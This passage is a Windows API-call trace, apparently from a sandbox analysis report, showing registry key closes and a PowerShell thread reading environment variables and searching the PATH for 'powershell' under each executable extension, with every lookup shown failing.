	[0279.105] RegCloseKey (hKey=0x1d0) returned 0x0
	[0279.106] LocalFree (hMem=0x2d72c0) returned 0x0
	[0285.241] RegCloseKey (hKey=0x1d0) returned 0x0
	[0294.606] RegCloseKey (hKey=0x388) returned 0x0
	[0294.606] RegCloseKey (hKey=0x384) returned 0x0
	[0294.606] RegCloseKey (hKey=0x380) returned 0x0
	[0294.606] RegCloseKey (hKey=0x37c) returned 0x0
	[0294.607] RegCloseKey (hKey=0x378) returned 0x0
	[0294.607] RegCloseKey (hKey=0x374) returned 0x0
	[0294.607] RegCloseKey (hKey=0x370) returned 0x0
	[0294.607] RegCloseKey (hKey=0x348) returned 0x0
	[0294.608] RegCloseKey (hKey=0x39c) returned 0x0
	[0294.608] RegCloseKey (hKey=0x368) returned 0x0
	[0294.608] RegCloseKey (hKey=0x364) returned 0x0
	[0294.609] RegCloseKey (hKey=0x360) returned 0x0
	[0294.609] RegCloseKey (hKey=0x35c) returned 0x0
	[0294.609] RegCloseKey (hKey=0x358) returned 0x0
	[0294.609] RegCloseKey (hKey=0x354) returned 0x0
	[0294.610] RegCloseKey (hKey=0x350) returned 0x0
	[0294.610] RegCloseKey (hKey=0x34c) returned 0x0
	[0294.610] RegCloseKey (hKey=0x398) returned 0x0
	[0294.610] RegCloseKey (hKey=0x394) returned 0x0
	[0294.611] RegCloseKey (hKey=0x33c) returned 0x0
	[0294.611] RegCloseKey (hKey=0x338) returned 0x0
	[0294.611] RegCloseKey (hKey=0x334) returned 0x0
	[0294.611] RegCloseKey (hKey=0x330) returned 0x0
	[0294.612] RegCloseKey (hKey=0x32c) returned 0x0
	[0294.612] RegCloseKey (hKey=0x328) returned 0x0
	[0294.612] RegCloseKey (hKey=0x320) returned 0x0
	[0294.612] RegCloseKey (hKey=0x30c) returned 0x0
	[0294.613] RegCloseKey (hKey=0x304) returned 0x0
	[0294.613] RegCloseKey (hKey=0x1d0) returned 0x0
	[0294.613] RegCloseKey (hKey=0x390) returned 0x0
	[0294.613] RegCloseKey (hKey=0x36c) returned 0x0
	[0294.614] RegCloseKey (hKey=0x3a0) returned 0x0
	[0302.682] RegCloseKey (hKey=0x3a0) returned 0x0
	[0641.578] RegCloseKey (hKey=0x3a4) returned 0x0
	[0641.578] RegCloseKey (hKey=0x398) returned 0x0

Thread:
	id = 257
	os_tid = 0xd58

	[0307.277] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0307.281] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0307.285] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.285] CoTaskMemFree (pv=0x389b60) 
	[0307.287] VirtualQuery (in: lpAddress=0x1c8fdc60, lpBuffer=0x1c8feb20, dwLength=0x30 | out: lpBuffer=0x1c8feb20*(BaseAddress=0x1c8fd000, AllocationBase=0x1bf70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0307.290] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.290] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.290] CoTaskMemFree (pv=0x389b60) 
	[0307.293] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.293] CoTaskMemFree (pv=0x389b60) 
	[0307.296] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.296] CoTaskMemFree (pv=0x389b60) 
	[0307.305] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.305] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.305] CoTaskMemFree (pv=0x389b60) 
	[0307.308] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.308] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.308] CoTaskMemFree (pv=0x389b60) 
	[0307.309] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.310] CoTaskMemFree (pv=0x389b60) 
	[0307.314] VirtualQuery (in: lpAddress=0x1c8fdf10, lpBuffer=0x1c8fedd0, dwLength=0x30 | out: lpBuffer=0x1c8fedd0*(BaseAddress=0x1c8fd000, AllocationBase=0x1bf70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0307.315] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.315] CoTaskMemFree (pv=0x389b60) 
	[0307.318] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.318] CoTaskMemFree (pv=0x389b60) 
	[0307.318] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.318] CoTaskMemFree (pv=0x389b60) 
	[0307.319] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.319] CoTaskMemFree (pv=0x389b60) 
	[0307.322] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0307.322] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0307.322] CoTaskMemFree (pv=0x389b60) 
	[0308.164] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.164] CoTaskMemFree (pv=0x389b60) 
	[0308.712] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.713] CoTaskMemFree (pv=0x389b60) 
	[0308.714] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.714] CoTaskMemFree (pv=0x389b60) 
	[0308.716] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.716] CoTaskMemFree (pv=0x389b60) 
	[0308.717] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.717] CoTaskMemFree (pv=0x389b60) 
	[0308.719] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.719] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.719] CoTaskMemFree (pv=0x389b60) 
	[0308.720] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.720] CoTaskMemFree (pv=0x389b60) 
	[0308.739] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0308.739] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.739] CoTaskMemFree (pv=0x389b60) 
	[0311.616] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0311.616] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0311.616] CoTaskMemFree (pv=0x389b60) 
	[0312.767] CoTaskMemAlloc (cb=0x104) returned 0x389b60
	[0312.767] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x389b60, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0312.767] CoTaskMemFree (pv=0x389b60) 
	[0312.767] CoTaskMemAlloc (cb=0x128) returned 0x3321a0
	[0312.768] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3321a0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0312.768] CoTaskMemFree (pv=0x3321a0) 
	[0315.718] CoTaskMemAlloc (cb=0x20e) returned 0x1b8fd5e0
	[0315.718] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8fd5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0315.718] CoTaskMemFree (pv=0x1b8fd5e0) 
	[0316.195] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0316.196] SetErrorMode (uMode=0x1) returned 0x1
	[0316.199] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0323.866] SetErrorMode (uMode=0x1) returned 0x1
	[0324.235] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.235] SetErrorMode (uMode=0x1) returned 0x1
	[0324.235] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.243] SetErrorMode (uMode=0x1) returned 0x1
	[0324.244] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.245] SetErrorMode (uMode=0x1) returned 0x1
	[0324.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.253] SetErrorMode (uMode=0x1) returned 0x1
	[0324.254] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.254] SetErrorMode (uMode=0x1) returned 0x1
	[0324.254] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0324.262] SetErrorMode (uMode=0x1) returned 0x1
	[0324.264] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0324.264] SetErrorMode (uMode=0x1) returned 0x1
	[0324.264] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.021] SetErrorMode (uMode=0x1) returned 0x1
	[0325.022] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.023] SetErrorMode (uMode=0x1) returned 0x1
	[0325.023] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.031] SetErrorMode (uMode=0x1) returned 0x1
	[0325.032] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.032] SetErrorMode (uMode=0x1) returned 0x1
	[0325.032] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.040] SetErrorMode (uMode=0x1) returned 0x1
	[0325.042] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.042] SetErrorMode (uMode=0x1) returned 0x1
	[0325.042] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.051] SetErrorMode (uMode=0x1) returned 0x1
	[0325.052] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.052] SetErrorMode (uMode=0x1) returned 0x1
	[0325.053] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.984] SetErrorMode (uMode=0x1) returned 0x1
	[0325.985] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.985] SetErrorMode (uMode=0x1) returned 0x1
	[0325.985] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0325.993] SetErrorMode (uMode=0x1) returned 0x1
	[0325.994] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0325.994] SetErrorMode (uMode=0x1) returned 0x1
	[0325.995] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.002] SetErrorMode (uMode=0x1) returned 0x1
	[0326.004] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.004] SetErrorMode (uMode=0x1) returned 0x1
	[0326.004] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.012] SetErrorMode (uMode=0x1) returned 0x1
	[0326.013] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.013] SetErrorMode (uMode=0x1) returned 0x1
	[0326.013] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.021] SetErrorMode (uMode=0x1) returned 0x1
	[0326.022] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.022] SetErrorMode (uMode=0x1) returned 0x1
	[0326.023] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.927] SetErrorMode (uMode=0x1) returned 0x1
	[0326.928] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0326.928] SetErrorMode (uMode=0x1) returned 0x1
	[0326.928] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.937] SetErrorMode (uMode=0x1) returned 0x1
	[0326.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.938] SetErrorMode (uMode=0x1) returned 0x1
	[0326.938] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.938] SetErrorMode (uMode=0x1) returned 0x1
	[0326.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.939] SetErrorMode (uMode=0x1) returned 0x1
	[0326.939] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c8fde40 | out: lpFindFileData=0x1c8fde40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.939] SetErrorMode (uMode=0x1) returned 0x1
	[0326.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8fdca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.940] SetErrorMode (uMode=0x1) returned 0x1
